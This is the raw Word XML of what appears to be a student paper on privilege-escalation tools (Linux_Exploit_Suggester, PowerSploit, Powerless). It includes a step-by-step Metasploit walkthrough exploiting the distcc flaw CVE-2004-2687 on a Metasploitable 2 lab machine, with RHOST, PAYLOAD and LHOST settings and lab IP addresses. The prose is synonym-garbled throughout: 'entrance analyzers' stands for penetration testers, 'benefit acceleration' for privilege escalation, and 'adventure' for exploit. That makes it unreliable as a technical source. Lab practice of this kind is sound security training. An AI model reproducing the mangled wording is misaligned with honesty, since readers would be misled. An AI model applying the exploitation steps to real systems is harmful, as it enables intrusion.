        <w:t xml:space="preserve">It was vigorously propelled by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Linux_Exploit_Suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Pentura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:rPr>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE31532" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C37E90" w14:textId="11643393" w:rsidR="00985DDC" w:rsidRPr="00985DDC" w:rsidRDefault="00985DDC" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00985DDC">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="24292E"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A1421AD" w14:textId="5A6B56F2" w:rsidR="00985DDC" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:t xml:space="preserve"> is an accumulation of Microsoft PowerShell modules that can be utilized to help entrance analyzers amid all periods of an evaluation. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:t xml:space="preserve"> is contained the accompanying modules and contents:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F37527" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3020F576" w14:textId="77777777" w:rsidR="00985DDC" w:rsidRDefault="00985DDC" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Powerless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F24045" w14:textId="6DA51BE8" w:rsidR="00985DDC" w:rsidRDefault="00014C47" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:t xml:space="preserve">A Windows benefit acceleration (specification) content structured with OSCP labs (for example inheritance Windows machines without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00014C47">
        <w:t>) as a primary concern. The content speaks to a mixture of different benefit heightening checks, accumulated from different sources, all done by means of local Windows pairs present in pretty much every rendition of Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C8C36" w14:textId="77777777" w:rsidR="00014C47" w:rsidRPr="00985DDC" w:rsidRDefault="00014C47" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="632E8498" w14:textId="4AB06735" w:rsidR="00985DDC" w:rsidRPr="00985DDC" w:rsidRDefault="00014C47" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="398"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00014C47">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Note, the clump record likewise works on the most recent adaptations of Windows too. PowerShell isn't important to accomplish legitimate OS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00014C47">
        <w:t>count.</w:t>
      </w:r>
      <w:r w:rsidR="00985DDC" w:rsidRPr="00985DDC">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A7E029A" w14:textId="11BE772D" w:rsidR="00AF22DD" w:rsidRPr="00985DDC" w:rsidRDefault="00753988" w:rsidP="00985DDC">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00985DDC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F369C3F" w14:textId="738EA4F9" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
      <w:pPr>
        <w:spacing w:after="12" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="398" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>III.M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">OTIVATION AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">ONTRIBUTION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D14EF9C" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ROPOSED </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>ECHANISM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738FB88" w14:textId="77777777" w:rsidR="00AF22DD" w:rsidRDefault="00753988">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB6722" w14:textId="77777777" w:rsidR="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This work is proposed for rehearsing his infiltration abilities utilizing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2. The issue that we are looking here is that we need to infiltrate to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2 and when this </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>happens</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we comprehend that we are not signed in as root but rather as a client with less benefits! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10405627" w14:textId="27D1ABB1" w:rsidR="00014C47" w:rsidRDefault="00014C47" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C46A680" w14:textId="59B928ED" w:rsidR="00AF22DD" w:rsidRDefault="00C83A1A" w:rsidP="00014C47">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C254D77" wp14:editId="5E8AE840">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3148677</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>162140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2998470" cy="1282700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="9" name="Picture 9" descr="https://img.wonderhowto.com/img/13/10/63597105881167/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wonderhowto.com/img/13/10/63597105881167/0/hack-metasploitable-2-including-privilege-escalation.w145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1282700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00014C47">
        <w:t>The means have been recorded as pursues:</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E30E1" w14:textId="23F5C7B5" w:rsidR="00AF22DD" w:rsidRDefault="003775F4">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="419" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344909BF" wp14:editId="72868C83">
            <wp:extent cx="1978311" cy="2600049"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="https://upload.wikimedia.org/wikipedia/commons/thumb/c/cc/Privilege_Escalation_Diagram.svg/220px-Privilege_Escalatio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c/Privilege_Escalation_Diagram.svg/220px-Privilege_Escalation_Diagra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363" cy="2601432"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B5083B" w14:textId="77777777" w:rsidR="00985DDC" w:rsidRDefault="00985DDC" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="355" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F1CD2D" w14:textId="77777777" w:rsidR="00985DDC" w:rsidRDefault="00985DDC" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="355" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5755D9F0" w14:textId="6A096EF0" w:rsidR="00AF22DD" w:rsidRDefault="00054B99" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="355" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00054B99">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00054B99">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00054B99">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396C0DB" w14:textId="0CB6E250" w:rsidR="00AF22DD" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve">We need to begin the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve"> 2 (I guess that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>peruser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve"> can do it without a guide) and record the IP. For our model the IP of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C83A1A">
        <w:t xml:space="preserve"> 2 is </w:t>
      </w:r>
      <w:r w:rsidR="00054B99" w:rsidRPr="00054B99">
        <w:t>"192.168.1.4". The attackers IP is "192.168.1.6" for this example.</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19713DEB" w14:textId="77777777" w:rsidR="00054B99" w:rsidRDefault="00054B99" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2861283B" w14:textId="42391173" w:rsidR="00AF22DD" w:rsidRDefault="00054B99" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00054B99">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Start the Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225F39DA" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5B037C" w14:textId="432B33ED" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">First, we need to begin the PostgreSQL (administration </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> begin). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73EFCD" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7116A639" w14:textId="71400F6D" w:rsidR="00054B99" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E339F14" wp14:editId="11981AAA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>396875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2972435" cy="1781810"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1" name="Picture 1" descr="https://img.wonderhowto.com/img/97/25/63597103727692/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97/25/63597103727692/0/hack-metasploitable-2-including-privilege-escalation.w145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243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t>Then we are prepared to begin the Metasploit framework(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF7B625" w14:textId="4C76F837" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F377DFC" w14:textId="6A0C8FDB" w:rsidR="00AF22DD" w:rsidRDefault="00054B99" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00054B99">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Let the</w:t>
      </w:r>
      <w:r w:rsidR="00C83A1A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00054B99">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Penetration Begins</w:t>
      </w:r>
      <w:r w:rsidR="00753988">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A821BB9" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481ED3FF" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> security issues is Exploit CVE 2004-2687. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399F1FA" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A005E1D" w14:textId="173411C2" w:rsidR="00AF22DD" w:rsidRDefault="00C83A1A" w:rsidP="00C83A1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to the Metasploit's reassure and scan for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (look </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B278301" w14:textId="161C60C5" w:rsidR="00054B99" w:rsidRDefault="00C83A1A">
      <w:pPr>
        <w:ind w:left="-15" w:right="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="569B3E84" wp14:editId="27CCBAAB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>113376</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>248285</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3117215" cy="387350"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="8" name="Picture 8" descr="https://img.wonderhowto.com/img/12/55/63597105579059/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wonderhowto.com/img/12/55/63597105579059/0/hack-metasploitable-2-including-privilege-escalation.w145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7215" cy="387350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00054B99">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9C2F6" w14:textId="1FDDA6EA" w:rsidR="00054B99" w:rsidRDefault="00054B99">
      <w:pPr>
        <w:ind w:left="-15" w:right="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BE18B9" w14:textId="54CADFF6" w:rsidR="00054B99" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C83A1A">
        <w:t>Presently we are prepared to utilize the adventure and set the qualities we need for the RHOST, PAYLOAD and LHOST choices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E61B6A7" w14:textId="77777777" w:rsidR="00C83A1A" w:rsidRDefault="00C83A1A" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C73012" w14:textId="651C6BD5" w:rsidR="00054B99" w:rsidRDefault="00054B99" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15F3CAE1" wp14:editId="44BACA24">
            <wp:extent cx="2998470" cy="343535"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="https://img.wonderhowto.com/img/86/62/63597104500855/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86/62/63597104500855/0/hack-metasploitable-2-including-privilege-escalation.w145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343535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C0B97" w14:textId="63FCD8EB" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A56CA9" w14:textId="77777777" w:rsidR="009D67AD" w:rsidRDefault="009D67AD" w:rsidP="00054B99">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CE9ADF4" wp14:editId="3BC3528A">
            <wp:extent cx="2998470" cy="374015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="3" name="Picture 3" descr="https://img.wonderhowto.com/img/85/96/63597104719941/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85/96/63597104719941/0/hack-metasploitable-2-including-privilege-escalation.w14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470" cy="374015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
